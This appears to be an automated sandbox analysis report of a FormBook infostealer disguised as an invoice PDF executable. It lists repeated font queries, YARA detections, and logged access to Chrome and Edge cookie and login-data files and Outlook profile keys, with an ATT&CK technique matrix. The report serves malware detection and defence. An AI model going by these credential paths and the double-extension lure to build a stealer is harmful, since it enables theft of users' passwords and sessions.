            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		11
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
